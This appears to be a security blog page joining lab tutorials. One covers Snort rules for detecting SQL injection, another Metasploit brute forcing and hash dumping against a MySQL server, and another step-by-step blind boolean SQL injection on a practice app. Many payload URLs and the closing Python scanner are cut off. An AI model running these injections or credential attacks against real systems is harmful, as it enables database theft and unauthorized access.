
Detect SQL Injection Attack Using Snort IDS


Hacking Articles

Raj Chandel's Blog



posted in DATABASE HACKING, PENETRATION TESTING on JANUARY 11, 2018 by RAJ CHANDEL with 0 COMMENT

Hello friends!! Today we are going to discuss how to detect an SQL injection attack using Snort, but before moving ahead kindly read both of our previous articles related to Snort: installation (manually or using the apt repository) and its rule configuration to enable it as an IDS for your network.

Basically, in this tutorial we are using Snort to capture the network traffic and analyse it for the SQL injection quotes that get injected into a web page to obtain information about the database behind a web server. Snort will generate an alert for malicious traffic when it sees that traffic on its network, so network administrators are immediately alerted to the suspicious traffic and can take effective action against the attacking IP.

Requirement

IDS: Snort (Ubuntu)

Web application: Dhakkan

You can configure your own web server with the help of our article “Configure Web server for penetration testing”.

Let’s Begin!!

Identify Error Based SQL Injection


As we know, in error based SQL injection the attacker uses single quotes (') or double quotes (") to break the SQL query and so identify the vulnerability. Therefore be smart and add a rule in Snort which will analyse error based SQL injection on the server when someone tries to execute an SQL query in your network for unprivileged access to the database.

Execute the command given below in Ubuntu's terminal to open Snort's local rule file in a text editor.

sudo gedit /etc/snort/rules/local.rules

Now add the line given below, which will capture incoming traffic arriving at any network IP on port 80.

alert tcp any any -> any 80 (msg:"Error Based SQL Injection"; content:"%27"; sid:100000011;)

alert tcp any any -> any 80 (msg:"Error Based SQL Injection"; content:"%22"; sid:100000012;)

If you read the rules above you can notice that I have applied filters for the content “%27” and “%22”, which are the URL encoded forms the browser uses for single quotes (') and double quotes (") respectively at the time the URL is executed.

Turn on IDS mode of Snort by executing the command given below in the terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Now test the above rule by making an error based SQL injection attack on the web application “Dhakkan”: open the server IP in the web browser and use a single quote (') to identify the SQL injection vulnerability as shown below.

192.168.1.20/sqli/Less-1/?id=1'

For more detail on error based SQL injection read our previous article.

Now when the attacker executes malicious quotes in the browser to test for error based SQL injection, the IDS of the network should also capture this content and generate the alert.

As per our prediction, from the given image you can observe that Snort has generated an alert for error based SQL injection on capturing the malicious quotes.

So when the network admin gets an alert from the IDS he can take action against the attacking IP on the basis of it; as shown in the given image the malicious traffic is coming from 192.168.1.21 on port 80.

Testing Double Quotes Injection

Now again open the server IP in the web browser and use double quotes (") to identify the SQL injection vulnerability as shown below.

192.168.1.20/sqli/Less-4/?id=1"

Now when the attacker executes malicious quotes in the browser to test for double quote SQL injection, the IDS of the network should also capture this content and generate the alert.

From the given image you can observe that Snort has generated an alert for error based SQL injection on capturing the malicious quotes.

So when the network admin gets an alert from the IDS he can take action against the attacking IP on the basis of it; as shown in the given image the malicious traffic is coming from 192.168.1.21 on port 80.

Boolean Based SQL Injection


As we know, in Boolean based SQL injection the attacker uses the AND/OR operators: the attacker tries to confirm whether the database is vulnerable to Boolean SQL injection by evaluating the results of various queries which return either TRUE or FALSE.

Now add a rule in Snort which will analyse Boolean based SQL injection on the server when someone tries to execute an SQL query in your network for unprivileged access to the database. Here I have applied filters for the content “and” and “or” to be captured. Here nocase denotes not case sensitive: it matches AND/and and OR/or.

alert tcp any any -> any 80 (msg:"AND SQL Injection"; content:"and"; nocase; sid:100000060;)

alert tcp any any -> any 80 (msg:"OR SQL Injection"; content:"or"; nocase; sid:100000061;)

Turn on IDS mode of Snort by executing the command given below in the terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Again open the server IP in the web browser and use the AND operator to identify the Boolean SQL injection vulnerability as shown below.

192.168.1.20/sqli/Less-8/?id=1' AND 1=1 --+

For more detail on Boolean Based SQL injection read our previous article.

Now when the attacker executes malicious quotes in the browser to test for Boolean based SQL injection, the IDS of the network should also capture this content and generate the alert.

As per our calculation, from the given image you can observe that Snort has generated an alert for Boolean based SQL injection on capturing the content AND.

So when the network admin gets an alert from the IDS he can take action against the attacking IP on the basis of it; as shown in the given image the malicious traffic is coming from 192.168.1.21 on port 80.

Testing OR Operator
Again open the server IP in the web browser and use the OR operator to identify the Boolean SQL injection vulnerability as shown below.

192.168.1.20/sqli/Less-8/?id=1' OR 1=1 --+

Now when the attacker executes malicious quotes in the browser to test for Boolean based SQL injection, the IDS of the network should also capture this content and generate the alert.

As per our calculation, from the given image you can observe that Snort has generated an alert for Boolean based SQL injection on capturing the content OR.

So when the network admin gets an alert from the IDS he can take action against the attacking IP on the basis of it; as shown in the given image the malicious traffic is coming from 192.168.1.21 on port 80.

Encoded AND/OR

Similarly, in the rules given below I have applied filters for the content “%26%26” and “%7c%7c”, which are the URL encoded forms the browser uses for && and || respectively at the time the URL is executed.

alert tcp any any -> any 80 (msg:"AND SQL Injection"; content:"%26%26"; nocase; sid:100000008;)

alert tcp any any -> any 80 (msg:"OR SQL Injection"; content:"%7c%7c"; nocase; sid:100000009;)

Turn on IDS mode of Snort by executing the command given below in the terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Again open the server IP in the web browser and use the && operator to identify the Boolean SQL injection vulnerability as shown below.

192.168.1.20/sqli/Less-25/?id=1' %26%26 1==1 --+

For more details read our previous article.

Now when the attacker executes malicious quotes in the browser to test for Boolean based SQL injection, the IDS of the network should also capture this content and generate the alert.

As per our calculation, from the given image you can observe that Snort has generated an alert for Boolean based SQL injection on capturing the content %26%26.

So when the network admin gets an alert from the IDS he can take action against the attacking IP on the basis of it; as shown in the given image the malicious traffic is coming from 192.168.1.21 on port 80.

Testing Encoded OR Operator

Again open the server IP in the web browser and use the || operator to identify the Boolean SQL injection vulnerability as shown below.

192.168.1.20/sqli/Less-25/?id=1' %7C%7C 1==1 --+

Now when the attacker executes malicious quotes in the browser to test for Boolean based SQL injection, the IDS of the network should also capture this content and generate the alert.

As per our calculation, from the given image you can observe that Snort has generated an alert for Boolean based SQL injection on capturing the content %7C%7C.

So when the network admin gets an alert from the IDS he can take action against the attacking IP on the basis of it; as shown in the given image the malicious traffic is coming from 192.168.1.21 on port 80.

Identify Form Based SQL Injection


Form based SQL injection is also known as “POST error based SQL injection” because the attacker executes malicious quotes inside the login form of a web page, which contains text fields for the username and password used to log in to the web server.

Therefore now add a rule in Snort which will analyse form based SQL injection on the server when someone tries to execute an SQL query in your network for unprivileged access to the database.

alert tcp any any -> any 80 (msg:"Form Based SQL Injection"; content:"%27"; sid:1000003;)

If you read the rule above you can notice that I have applied a filter for the content “%27” to be captured; turn on IDS mode of Snort by executing the command given below in the terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

I used a single quote (') to break the query inside the username text field, then clicked on submit.

Username: '

From the given screenshot you can see that we got an error message (in blue colour), which means the database is vulnerable to SQL injection.

For more detail on Form Based SQL injection read our previous article.

Now when the attacker executes malicious quotes in the browser to test for form based SQL injection, the IDS of the network should also capture this content and generate the alert.

As per our prediction, from the given image you can observe that Snort has generated an alert for form based SQL injection on capturing the malicious quotes.

So when the network admin gets an alert from the IDS he can take action against the attacking IP on the basis of it; as shown in the given image the malicious traffic is coming from 192.168.1.21 on port 80.

Identify Order by SQL Injection
In order to identify the number of columns in the database, the untrusted user may use the order by clause, which arranges the result set in ascending or descending order of the columns used in the query.

Now add a rule in Snort which will analyse order by SQL injection on the server when someone tries to execute an SQL query in your network for unprivileged access to the database. Here again I have applied a filter for the content “order” to be captured.

alert tcp any any -> any 80 (msg:"Order by SQL Injection"; content:"order"; sid:1000005;)

Turn on IDS mode of Snort by executing the command given below in the terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Now again open the server IP in the web browser and use the order by string to identify the columns of the database as shown below.

192.168.1.20/sqli/Less-1/?id=1' order by 1,2,3 --+

Now when the attacker executes the malicious string in the browser to test for order by SQL injection, the IDS of the network should also capture this content and generate the alert.

As per our prediction, from the given image you can observe that Snort has generated an alert for order by SQL injection on capturing the malicious string.

So when the network admin gets an alert from the IDS he can take action against the attacking IP on the basis of it; as shown in the given image the malicious traffic is coming from 192.168.1.21 on port 80.

Identify Union Based SQL Injection
We all know that in error based SQL injection the attacker may use the UNION operator to combine the result sets of two or more SELECT statements. Therefore add a rule in Snort which will analyse union select SQL injection on the server when someone tries to execute an SQL query in your network for unprivileged access to the database. Here again I have applied a filter for the content “union” to be captured.

alert tcp any any -> any 80 (msg:"UNION SELECT SQL Injection"; content:"union"; sid:1000006;)

Turn on IDS mode of Snort by executing the command given below in the terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Now again open the server IP in the web browser and use the union select string to identify the columns of the database as shown below.

192.168.1.20/sqli/Less-1/?id=-1' union select 1,2,3 --+

Now when the attacker executes the malicious string in the browser to test for union select SQL injection, the IDS of the network should also capture this content and generate the alert.

As per our prediction, from the given image you can observe that Snort has generated an alert for union select SQL injection on capturing the malicious string.

So when the network admin gets an alert from the IDS he can take action against the attacking IP on the basis of it; as shown in the given image the malicious traffic is coming from 192.168.1.21 on port 80.
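The rules above match on raw bytes, so it is worth seeing exactly what fires and what does not. The following Python is an added example, not code from the article or from Snort: it emulates only the content, nocase and sid options of the rules above against three constructed HTTP requests, and the normalized-URI check at the end stands in for a rule written as content:"'"; http_uri;, which relies on Snort's http_inspect preprocessor decoding the URI before matching.

```python
"""Emulate how the article's Snort 2 rules match, using only the 'content',
'nocase' and 'sid' options.  Added example: this is not Snort's code and not
the article's; the HTTP requests below are constructed."""
import re
from urllib.parse import unquote

# The article's rules, with straight quotes (Snort rejects the curly ones).
RULES_TEXT = """
alert tcp any any -> any 80 (msg:"Error Based SQL Injection"; content:"%27"; sid:100000011;)
alert tcp any any -> any 80 (msg:"Error Based SQL Injection"; content:"%22"; sid:100000012;)
alert tcp any any -> any 80 (msg:"AND SQL Injection"; content:"and"; nocase; sid:100000060;)
alert tcp any any -> any 80 (msg:"OR SQL Injection"; content:"or"; nocase; sid:100000061;)
alert tcp any any -> any 80 (msg:"Order by SQL Injection"; content:"order"; sid:1000005;)
alert tcp any any -> any 80 (msg:"UNION SELECT SQL Injection"; content:"union"; sid:1000006;)
"""

RULE_RE = re.compile(r'msg:"([^"]+)";\s*content:"([^"]+)";\s*(nocase;)?\s*sid:(\d+);')


def parse_rules(text):
    """Parse msg/content/nocase/sid from each rule line (other options unsupported)."""
    rules = []
    for line in text.strip().splitlines():
        m = RULE_RE.search(line)
        if not m:
            raise ValueError("unsupported rule syntax: " + line)
        msg, content, nocase, sid = m.groups()
        rules.append({"sid": int(sid), "msg": msg,
                      "content": content, "nocase": nocase is not None})
    return rules


RULES = parse_rules(RULES_TEXT)


def content_matches(rule, payload):
    """'content' is a plain substring search over the raw TCP payload;
    'nocase' only makes that search case-insensitive."""
    if rule["nocase"]:
        return rule["content"].lower() in payload.lower()
    return rule["content"] in payload


def fired_sids(rules, payload):
    """sids of every rule whose content appears in the payload, ascending."""
    return sorted(r["sid"] for r in rules if content_matches(r, payload))


# Constructed requests.  The first is the article's Less-1 test as sent by a
# browser that percent-encodes the quote; the second sends the quote raw;
# the third is ordinary shop traffic with no injection in it at all.
ATTACK_ENCODED = ("GET /sqli/Less-1/?id=1%27 HTTP/1.1\r\n"
                  "Host: 192.168.1.20\r\n\r\n")
ATTACK_RAW = ("GET /sqli/Less-1/?id=1' HTTP/1.1\r\n"
              "Host: 192.168.1.20\r\n\r\n")
BENIGN = ("GET /store/orders?sort=price HTTP/1.1\r\n"
          "Host: shop.example\r\nAccept-Encoding: gzip\r\n\r\n")


def request_uri(request):
    """Request-target taken from the request line."""
    return request.split(" ", 2)[1]


def quote_in_normalized_uri(request):
    """What a rule written as content:"'"; http_uri; sees: http_inspect
    percent-decodes the URI before matching, so 1' and 1%27 look the same."""
    return "'" in unquote(request_uri(request))


if __name__ == "__main__":
    for name, req in [("encoded", ATTACK_ENCODED), ("raw", ATTACK_RAW), ("benign", BENIGN)]:
        print(name, fired_sids(RULES, req), quote_in_normalized_uri(req))
```

The nocase "or" rule and the "order" rule both fire on the benign /store/orders request while the "%27" rule misses the same quote sent unencoded, which is why rules of this shape are tuned against the normalized http_uri buffer before they go on real traffic.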

Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast. Contact Here

Penetration Testing on MYSQL (Port 3306)


posted in DATABASE HACKING, KALI LINUX, PENETRATION TESTING on SEPTEMBER 21, 2017
by RAJ CHANDEL with 1 COMMENT

Hello friends!! Today we are discussing internal penetration testing of a MySQL server. In our previous article we already discussed how to configure MySQL on Ubuntu, which you can read from here; now we move on to its penetration testing.

Attacker: kali Linux

Target: ubuntu 14.04.1 (mysql server), IP: 192.168.1.216

Let's start!!

Scanning MYSQL
Scanning plays an important role in penetration testing because through scanning the attacker finds out which services and open ports are available for enumeration and attack.

Here we are using nmap for scanning port 3306.

nmap -sT 192.168.1.216

If the service is active on the targeted server then nmap shows an open STATE for port 3306.

Enumerating MYSQL Banner
An attacker always performs enumeration to find important information such as the software version, which is known as banner grabbing, and then checks its state of vulnerability against any exploit.

Open the terminal in your Kali Linux and load the Metasploit framework; now type the following commands to scan for the MySQL version.

use auxiliary/scanner/mysql/mysql_version

msf auxiliary(mysql_version) > set rhosts 192.168.1.216

msf auxiliary(mysql_version) > set rport 3306

msf auxiliary(mysql_version) > run

From the given image you can read the highlighted text, which shows that MySQL 5.5.57 is the installed version of MySQL, with protocol 10, on the Ubuntu 14.04.1 operating system.

MYSQL Brute Force Attack
An attacker always tries a brute force attack to steal credentials for unauthorized access.

This module simply queries the MySQL instance for a specific user/pass (default is root with blank).

msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > set rhosts 192.168.1.216

msf auxiliary(mysql_login) > set rport 3306

msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt

msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt

msf auxiliary(mysql_login) > run

This will start the brute force attack and try to find a valid username and password combination using the users.txt and password.txt files.

From the given image you can observe that our MySQL server is not secure against brute force attack, because it shows the matching combination of username root and password toor for login.

Once the attacker retrieves valid credentials he can log in directly to the MySQL server to steal or destroy the database information.

Stealing MYSQL information


This module allows for simple SQL statements to be executed against a MySQL instance
given the appropriate credentials.

use auxiliary/admin/mysql/mysql_sql

msf auxiliary(mysql_sql) > set rhost 192.168.1.216

msf auxiliary(mysql_sql) > set username root

msf auxiliary(mysql_sql) > set password toor

msf auxiliary(mysql_sql) > set SQL show databases;

msf auxiliary(mysql_sql) > run

From the given image you can observe that it has executed the SQL query and dumped the names of the databases.

Extracting MYSQL Schema Information


This module extracts the schema information from a MySQL DB server.

use auxiliary/scanner/mysql/mysql_schemadump

msf auxiliary(mysql_schemadump) > set rhosts 192.168.1.216

msf auxiliary(mysql_schemadump) > set username root

msf auxiliary(mysql_schemadump) > set password toor

msf auxiliary(mysql_schemadump) > run

Here it has dumped the information schema for the database “ignite” with table name “student”: 5 column names with their column types:

DB: ignite

Table name: student

Last Name     First Name    Student ID    Major         Dorm
varchar(30)   varchar(30)   int(11)       varchar(20)   varchar(20)

Check File Privileges

Open the my.cnf file to verify file privileges using the following command:

gedit /etc/mysql/my.cnf

Here you can see the statements given below are uncommented:

mysqld_safe
mysqld
secure_file_priv

If these statements are uncommented then it becomes very easy for an attacker to perform file enumeration.

Mysql File Enumeration


This module will enumerate files and directories using the MySQL load_file feature.

use auxiliary/scanner/mysql/mysql_file_enum

msf auxiliary(mysql_file_enum) > set rhosts 192.168.1.216

msf auxiliary(mysql_file_enum) > set username root

msf auxiliary(mysql_file_enum) > set password toor

msf auxiliary(mysql_file_enum) > set DIR_LIST /root/Desktop/file.txt

msf auxiliary(mysql_file_enum) > run

Here it will start identifying whether the files in the given list exist on the target system or not.

From the given image you can observe that it has found that the directories /etc, /var and /var/www exist.

Enumerate MYSQL writeable directories


Enumerate writeable directories using the MySQL SELECT INTO DUMPFILE feature; for more information see the URL in the references. ***Note: For every writable directory found, a file with the specified FILE_NAME containing the text test will be written to the directory.***

use auxiliary/scanner/mysql/mysql_writable_dirs

msf auxiliary(mysql_writable_dirs) > set rhosts 192.168.1.216

msf auxiliary(mysql_writable_dirs) > set username root

msf auxiliary(mysql_writable_dirs) > set password toor

msf auxiliary(mysql_writable_dirs) > set DIR_LIST /root/Desktop/file.txt

msf auxiliary(mysql_writable_dirs) > run

Here we assigned a list of files so that we can identify the writable directories, and from the given image you can observe that it has found write permission only for /tmp.

Mysql User Enumeration
This module allows for simple enumeration of a MySQL database server, provided proper credentials to connect remotely.

use auxiliary/admin/mysql/mysql_enum

msf auxiliary(mysql_enum) > set rhost 192.168.1.216

msf auxiliary(mysql_enum) > set username root

msf auxiliary(mysql_enum) > set password toor

msf auxiliary(mysql_enum) > run

It will start retrieving information such as the list of other user accounts and user privileges on the MySQL server.

From the given image it will be clear to you that it has shown the list of accounts with their password hashes and the list of users who have GRANT privileges.

As you can see, other than the user root it has some more users, such as sr with a password hash; here you can crack this password using a password cracking tool.

Extract MYSQL Username with Hash Password
This module extracts the usernames and encrypted password hashes from a MySQL server
and stores them for later cracking.

use auxiliary/scanner/mysql/mysql_hashdump

msf auxiliary(mysql_hashdump) > set rhosts 192.168.1.216

msf auxiliary(mysql_hashdump) > set username root

msf auxiliary(mysql_hashdump) > set password toor

msf auxiliary(mysql_hashdump) > run

Now from the screenshot you can see the hash value of the password is given for all users. Metasploit stores these hash values inside the /tmp folder, and later John the Ripper is used for cracking the passwords.

Crack Hash Password with John the Ripper
This module uses John the Ripper to identify weak passwords that have been acquired from the mysql_hashdump module. Passwords that have been successfully cracked are then saved as proper credentials.

use auxiliary/analyze/jtr_mysql_fast

msf auxiliary(jtr_mysql_fast) > options

msf auxiliary(jtr_mysql_fast) > run

By default it will use the Metasploit wordlist against the hash values that have been saved and start cracking them.

If you look at the image given below you can perceive that it has successfully cracked the double SHA-1 hashes and recovered the passwords in plain text.

Now using the credentials retrieved above you can try to log in to the MySQL server.

Here you can see we successfully logged in to the server. Hence an attacker can easily breach the security of the server and steal the important information or modify it.

Secure MYSQL through port forwarding
In order to secure the MySQL server the admin can move the service from the default port to a specific port. Open the my.cnf file using the following command to make the change:

gedit /etc/mysql/my.cnf

Now change port 3306 into any other port such as 3000 as shown in the given image, save the changes and restart the service.

service mysql restart

Verify it using the nmap command as given below:

nmap -sT 192.168.1.216

Prevent Mysql against brute force attack

In order to secure the MySQL server the admin can bind the service to localhost. Open the my.cnf file using the following command to make the change:

gedit /etc/mysql/my.cnf

You only need to enable bind-address by uncommenting it as shown in the given images, then restart the service.

service mysql restart

Now let's verify it by making a brute force attack in the same way as above using the dictionary.

Great!! The attacker is not able to connect to the server, which resists the brute force attack as well, as shown in the given image.

The admin should GRANT all privileges to a specific user only from a specific IP address, which prevents alteration of the database information by attackers.

Now, for granting all privileges, log in to the MySQL server and type the following query:

mysql> GRANT ALL PRIVILEGES ON *.* TO 'root'@'192.168.1.220' IDENTIFIED BY 'toor' WITH GRANT OPTION;

To tell the server to reload the grant tables, perform a flush-privileges operation:

mysql> FLUSH PRIVILEGES;

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher
Contact Here

Beginner Guide to SQL Injection Boolean Based (Part 2)


posted in DATABASE HACKING, KALI LINUX, PENETRATION TESTING on JULY 9, 2017
by RAJ CHANDEL with 0 COMMENT

There are so many ways to hack a database using SQL injection: as we saw in our previous tutorials, the error based attack, the login form based attack and many more different types of attack to retrieve information from inside the database. In the same way, today we will learn a new type of SQL injection attack known as the blind Boolean based attack.

An attacker always checks for SQL injection vulnerability using a single quote (') inside the URL to break the statement in order to receive an SQL error message. It is a fight between developer and attacker: the developer increases the security level and the attacker tries to break it. This time the developer has blocked error messages as output on the website. Hence, even if the database is vulnerable to SQL injection, the attacker does not obtain any error message on the website. The attacker will try to confirm whether the database is vulnerable to blind SQL injection by evaluating the results of various queries which return either TRUE or FALSE.

Let’s start!!

Using Dhakkan we will demonstrate blind SQL injection.

Lesson 8
Lesson 8 is about blind Boolean based injection, therefore first we need to open http://localhost:81/sqli/Less-8/?id=1 in the browser; this will send the following query to the database.

SELECT * from table_name WHERE id=1

As output it will display the yellow text “you are in” on the web page, as shown in the given image.

When the attacker tries to break this query using a single quote ('), http://localhost:81/sqli/Less-8/?id=1', or some other technique, he will not be able to find any error message. Moreover, the yellow text disappears if the attacker tries to inject an invalid query, as also shown in the given image.

Then the attacker goes for blind SQL injection to make sure that the injected query returns an answer, either true or false.

http://localhost:81/sqli/Less-8/?id=1' AND 1=1 --+
SELECT * from table_name WHERE id=1' AND 1=1

Now the database tests the given condition, whether 1 is equal to 1; if the query is valid it returns TRUE, and from the screenshot you can see we got the yellow text “you are in” again, which means our query is valid.

In the next query we check the URL

http://localhost:81/sqli/Less-8/?id=1' AND 1=0 --+
SELECT * from table_name WHERE id=1' AND 1=0

Now it will test the given condition, whether 1 is equal to 0; as we know 1 is not equal to 0, the database answers the query with ‘FALSE’. The screenshot confirms it when the yellow text disappears again.

Hence it is confirmed that the web application is vulnerable to blind SQL injection. Using true and false conditions we are going to retrieve database information.

Length of database string


The following query will ask for the length of the database name string. For example, the name of the database IGNITE contains 6 letters, so the string length for database IGNITE is equal to 6.

Similarly we will inject the query given below, which asks whether the length of the database string is equal to 1; in response to that query it will answer TRUE or FALSE through the text “you are in”.

http://localhost:81/sqli/Less-8/?id=1' AND (length(database())) = 1 --+

From the given screenshot you can see the text disappears again, which means it returned FALSE, replying NO, the length of the database string is not equal to 1.

http://localhost:81/sqli/Less-8/?id=1' AND (length(database())) = 2 --+

Again it tests whether the length of the database string is equal to 2; it returned FALSE, replying NO, the length of the database string is not equal to 2. Repeat the same step until we receive TRUE, for string length 3/4/5 and so on.

http://localhost:81/sqli/Less-8/?id=1' AND (length(database())) = 8 --+

When I tested for the string length equal to 8 it answered TRUE, and as a result the yellow text “you are in” appears again.

As we know the computer does not understand human language, it reads only binary, therefore we will use ASCII codes. The ASCII code associates an integer value with every symbol in the character set, such as letters, digits, punctuation marks, special characters and control characters.

For example, look at the ASCII codes of the following string:

1 = I = 73

2 = G = 71

3 = N = 78

4 = I = 73

5 = T = 84

6 = E = 69

Image Source: lookuptable.com

Further, we will enumerate the database name using ASCII characters for all 8 characters of the string.

The next query asks the database to test the condition whether the first character of the database name is greater than 100, using ascii and substr.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select databa

It reflects a TRUE condition; hence if you match the ASCII characters you will observe that the lowercase letters have been running from 100 till 172.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select databa

Similarly it tests again whether the first letter is greater than 120. But this time it returns FALSE, which means the first letter is greater than 100 and less than 120.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select databa

Next it compares the first character with 101; again we got FALSE.

We performed this test from 101 till 114 but received FALSE every time.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select databa

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select databa

Finally we receive a TRUE reply at 115, which means the first character is equal to 115, where 115 = ‘s’.

Similarly, test for the second character: repeat the above step, replacing the first position with the second.
http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select databa

I received a TRUE reply at 101, which means the second character is equal to 101, and 101 = ‘e’.

Similarly I performed this for all eight characters and got the following result:


1 = s = 115

2 = e = 101

3 = c = 99

4 = u = 117

5 = r = 114

6 = i = 105

7 = t = 116

8 = y = 121

Table string length


We use the same technique to enumerate information about the tables inside the database. The given query tests whether the length of the first table name is greater than 5.
http://localhost:81/sqli/Less-8/?id=1' AND (length((select table_name f

In reply we receive TRUE and text “you are in” appears again on the web site.

The given query tests whether the length of the first table name is greater than 6.
http://localhost:81/sqli/Less-8/?id=1' AND (length((select table_name f

In reply we receive FALSE and text “you are in” disappears again from the web site.

The given query tests whether the length of the first table name is equal to 6.
http://localhost:81/sqli/Less-8/?id=1' AND (length((select table_name f

In reply we receive TRUE and text “you are in” appears again on the web site.

Similarly I tested the second and third tables using the same technique, replacing only the table number in the same query.

Similarly, enumerate the fourth table using the following query, which tests whether the length of the fourth table name is equal to 5.
http://localhost:81/sqli/Less-8/?id=1' AND (length((select table_name f

In reply we receive TRUE and text “you are in” appears again on the web site.

As we did for the database name, we now use the same ASCII technique to retrieve the table name.

Next we enumerate the 4th table name using ASCII codes, for all 5 characters.

The next query asks the database to test whether the first character of the table name is greater than 115, using ascii() on a substring.
http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select table_

It reflects a TRUE condition, and the text “you are in” appears again on the web site; hence you can match the character against the ASCII table.

The next query asks the database to test whether the first character of the table name is greater than 120, using ascii() on a substring.
http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select table_

But this time it returns FALSE, which means the first letter is greater than 115 and less than 120.

Proceeding to equate the character with the ASCII codes between 115 and 120. The next query asks the database to test whether the first character of the table name is greater than 120, using ascii() on a substring.
http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select table_

It returns FALSE and the text disappears.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select table_

It returns TRUE and the text appears.

Similarly we tested the remaining characters and received the following result:

1 = u = 117

2 = s = 115

3 = e = 101

4 = r = 114

5 = s = 115

User Name Enumeration
Using the same method we are going to enumerate the length of the username string from inside the table users.

The query given below tests whether the string length is equal to 4.
http://localhost:81/sqli/Less-8/?id=1' AND (length((select username fro

It replies TRUE, shown by the yellow-coloured text.

Using the same method we are going to enumerate the username from inside the table users.

The query given below tests the first character using its ASCII code.
http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select userna

We received FALSE, which means the first character must be less than 100.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select userna

We received TRUE, which means the first character must be more than 50.

Similarly,
http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select userna

We received TRUE, which means the first character must be more than 60.

Similarly,
http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select userna

We received FALSE, which means the first character is less than 70.

Hence the first character must lie between ASCII codes 60 and 70.

Proceeding to compare the character against different ASCII codes using the following query.
http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select userna

This time we successfully receive TRUE, with the text “you are in” appearing.

Similarly I tested all four characters in order to retrieve the username:

1 = D = 68

2 = u = 117

3 = m = 109

4 = b = 98
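From the defender's side, the whole walkthrough above has one tell: every character costs the attacker a run of requests whose only difference is the number being compared. The following Python log scanner is an added example, not code from the original post or from the Snort project; it does offline what the Snort rules earlier on this page do on the wire. It URL-decodes each request URI from an access log, flags the length() and ascii(substr(...)) comparison constructs used above, and counts such probes per source address, because a burst of them from one IP is the signature of blind enumeration. The log lines, IP addresses, timestamps, the search.php requests and the burst threshold are all constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access log (Apache "combined"-style, abbreviated). The request
# URIs mirror the boolean-based probes walked through above: a length() check on
# database(), then ascii(substr(...)) comparisons narrowing down one character.
# IP addresses, timestamps and the search.php requests are invented for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Jan/2018:10:00:01 +0000] "GET /sqli/Less-8/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [11/Jan/2018:10:00:02 +0000] "GET /sqli/Less-8/?id=1%27%20AND%20(length(database()))%20=%208%20--+ HTTP/1.1" 200 512
10.0.0.5 - - [11/Jan/2018:10:00:03 +0000] "GET /sqli/Less-8/?id=1%27%20AND%20(ascii(substr((select%20database()),1,1)))%20%3E%20100%20--+ HTTP/1.1" 200 512
10.0.0.5 - - [11/Jan/2018:10:00:04 +0000] "GET /sqli/Less-8/?id=1%27%20AND%20(ascii(substr((select%20database()),1,1)))%20%3E%20120%20--+ HTTP/1.1" 200 498
10.0.0.5 - - [11/Jan/2018:10:00:05 +0000] "GET /sqli/Less-8/?id=1%27%20AND%20(ascii(substr((select%20database()),1,1)))%20=%20101%20--+ HTTP/1.1" 200 498
10.0.0.5 - - [11/Jan/2018:10:00:06 +0000] "GET /sqli/Less-8/?id=1%27%20AND%20(ascii(substr((select%20database()),1,1)))%20=%20115%20--+ HTTP/1.1" 200 512
192.168.1.20 - - [11/Jan/2018:10:01:00 +0000] "GET /sqli/Less-8/?id=2 HTTP/1.1" 200 512
192.168.1.20 - - [11/Jan/2018:10:01:05 +0000] "GET /search.php?q=black+%27and%27+white HTTP/1.1" 200 2048
172.16.0.9 - - [11/Jan/2018:10:02:00 +0000] "GET /sqli/Less-8/?id=1%27%20AND%20(ascii(substr((select%20database()),2,1)))%20%3E%2064%20--+ HTTP/1.1" 200 512
"""

# One Apache/nginx "combined"-style access log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Patterns on the decoded URI, mirroring what a Snort content/pcre rule would look for:
# a quote closing the original literal followed by a boolean operator, a comparison
# on length() or on ascii(substr(...)), and a trailing comment discarding the rest.
PROBE_PATTERNS = {
    "quote-and-condition": re.compile(r"'\s*(?:and|or)\b", re.I),
    "length-probe": re.compile(r"\blength\s*\(", re.I),
    "ascii-substr-probe": re.compile(r"\bascii\s*\(\s*substr(?:ing)?\s*\(", re.I),
    "comment-terminator": re.compile(r"(?:--[\s+]|--$|#)"),
}


def classify_uri(raw_uri):
    """Return the names of the probe patterns matching the URL-decoded request URI."""
    decoded = unquote_plus(raw_uri)
    # Decode a second time: double-encoded payloads otherwise slip past the patterns.
    decoded = unquote_plus(decoded)
    return [name for name, rx in PROBE_PATTERNS.items() if rx.search(decoded)]


def scan_access_log(text, burst_threshold=5):
    """Scan log text and return per-request hits plus the source IPs whose probe
    volume looks like character-by-character enumeration.

    Recovering one character by comparisons takes about seven requests with a
    bisection over the 128 ASCII codes, and more with the linear stepping shown
    above, so even a short name produces dozens of near-identical requests."""
    hits = []
    per_ip = Counter()
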